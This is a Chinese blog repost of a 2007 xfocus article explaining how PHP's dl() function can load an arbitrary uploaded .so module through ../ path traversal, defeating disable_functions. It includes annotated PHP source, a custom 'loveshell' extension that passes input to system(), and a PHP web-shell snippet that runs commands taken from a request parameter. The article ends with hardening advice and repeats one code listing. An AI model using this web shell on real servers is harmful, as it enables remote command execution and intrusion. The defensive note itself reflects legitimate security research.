Chinaunix首页 | 论坛 | 博客

ubuntu,linux天堂2541

首页 |  博文目录 |  关于我

NyLZSIO

  • 博客访问: 812478
  • 博文数量: 770
  • 博客积分: 5000
  • 博客等级: 大校
  • 技术积分: 4950
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-09 17:49
文章分类

全部博文(770)

文章存档

2011年(1)

2008年(769)

我的朋友
最近访客
推荐博文
[PHP]利用dl函数突破disable_functions执行命令

分类:

2008-10-10 11:09:41

FROM: xfocus.net
创建时间:2007-04-19
文章提交:T_Torchidy (jnchaha_at_163.com)

PHP 是一款功能强大应用广泛的脚本语言,很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的功能,所以大部分的服务器都对 PHP做了严格的限制,包括使用open_basedir限制可以操作的目录以及使用disable_functions限制程序使用一些可以直接执行系统命令的函数如system,exec,passthru,shell_exec,proc_open等等。但是如果服务器没有对dl()函数做限制,一样可以利用dl()函数饶过这些限制。
    dl()函数允许在php脚本里动态加载php模块,默认是加载extension_dir目录里的扩展,该选项是PHP_INI_SYSTEM 范围可修改的,只能在php.ini或者apache主配置文件里修改。当然,你也可以通过enable_dl选项来关闭动态加载功能,而这个选项默认为 On的,事实上也很少人注意到这个。dl()函数在设计时存在安全漏洞,可以用../这种目录遍历的方式指定加载任何一个目录里的so等扩展文件, extension_dir限制可以被随意饶过。所以我们可以上传自己的so文件,并且用dl函数加载这个so文件然后利用so文件里的函数执行其他操作,包括系统命令。
复制内容到剪贴板
代码:
    PHP_FUNCTION(dl)
{
    pval **file;

#ifdef ZTS
    if ((strncmp(sapi_module.name, "cgi", 3)!=0) &&
        (strcmp(sapi_module.name, "cli")!=0) &&
        (strncmp(sapi_module.name, "embed", 5)!=0)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "Not supported in multithreaded Web servers - use extension statements in your php.ini");
        RETURN_FALSE;
    }            //验证是否可以使用dl函数,在多线程web服务器里是禁止的
#endif

    /* obtain arguments */
    if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &file) == FAILURE) {
        WRONG_PARAM_COUNT;
    }

    convert_to_string_ex(file);       //取得参数

    if (!PG(enable_dl)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extentions aren't enabled");//验证是否enable_dl,默认为on
    } else if (PG(safe_mode)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extensions aren't allowed when running in Safe Mode");//验证是否safe_mode打开
    } else {
        php_dl(*file, MODULE_TEMPORARY, return_value TSRMLS_CC);  //开始调用加载
        EG(full_tables_cleanup) = 1;
    }
下面是开始处理模块的加载
复制内容到剪贴板
代码:
void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)
{
    void *handle;
    char *libpath;
    zend_module_entry *module_entry, *tmp;
    zend_module_entry *(*get_module)(void);
    int error_type;
    char *extension_dir;            //定义一些变量
        
    if (type==MODULE_PERSISTENT) {
        /* Use the configuration hash directly, the INI mechanism is not yet initialized */
        if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {
            extension_dir = PHP_EXTENSION_DIR;
        }
    } else {
        extension_dir = PG(extension_dir);
    }                        //取得php.ini里的设置也就是extension_dir的目录

    if (type==MODULE_TEMPORARY) {
        error_type = E_WARNING;
    } else {
        error_type = E_CORE_WARNING;
    }

    if (extension_dir && extension_dir[0]){
        int extension_dir_len = strlen(extension_dir);

        libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

        if (IS_SLASH(extension_dir[extension_dir_len-1])) {
            sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */
        } else {
            sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */
        }                    //构造最终的so文件的位置,只是简单的附加,并没有对传入的参数做任何检查,包括open_basedir等
    } else {
        libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));
    }
    /* load dynamic symbol */
    handle = DL_LOAD(libpath);            //开始真正的调用了
看到了吧,我们可以调用任意的so了哦!下一步就是编写自己的so模块,并且调用他。按照官方提供的模块编写方法,我写了个很简单的,主要的导出函数loveshell如下:
复制内容到剪贴板
代码:
PHP_FUNCTION(loveshell)

{
        char *command;
        int command_len;

        if (ZEND_NUM_ARGS() != 1 || zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,"s", &command, &command_len) == FAILURE) {
          WRONG_PARAM_COUNT;
        }
        system(command);
        zend_printf("I recieve %s",command);
}
注意由于php4和php5的结构不一样,所以如果想要能顺利调用扩展,那么在php4环境下就要将上面的代码放到php4环境下编译,php5的就要在php5环境下编译。我们将编写好的扩展上传到服务器,就可以利用下面的代码执行命令了:
复制内容到剪贴板
代码:
        dl('../../../../../../../../../www/users/');
    $cmd=$_REQUEST[c]." 2>&1>tmp.txt";
    loveshell($cmd);
    echo "
";
    echo file_get_contents('tmp.txt');
    ?>
所以如果想保证服务器的安全,请将这个函数加到disable_functions里或者将安全模式打开吧,在安全模式下dl函数是无条件禁止的!:)      
--------------------next---------------------
复制内容到剪贴板
代码:
void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)
{
    void *handle;
    char *libpath;
    zend_module_entry *module_entry, *tmp;
    zend_module_entry *(*get_module)(void);
    int error_type;
    char *extension_dir;            //定义一些变量
        
    if (type==MODULE_PERSISTENT) {
        /* Use the configuration hash directly, the INI mechanism is not yet initialized */
        if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {
            extension_dir = PHP_EXTENSION_DIR;
        }
    } else {
        extension_dir = PG(extension_dir);
    }                        //取得php.ini里的设置也就是extension_dir的目录

    if (type==MODULE_TEMPORARY) {
        error_type = E_WARNING;
    } else {
        error_type = E_CORE_WARNING;
    }

    if (extension_dir && extension_dir[0]){
        int extension_dir_len = strlen(extension_dir);

        libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

        if (IS_SLASH(extension_dir[extension_dir_len-1])) {
            sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */
        } else {
            sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */
        }                    //构造最终的so文件的位置,只是简单的附加,并没有对传入的参数做任何检查,包括open_basedir等
    } else {
        libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));
    }
    /* load dynamic symbol */
    handle = DL_LOAD(libpath);            //开始真正的调用了
--------------------next---------------------

阅读(630) | 评论(0) | 转发(0) |
0

上一篇:[整理]调整ext3文件系统的性能

下一篇:用pf实现一个端口提供多种服务

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6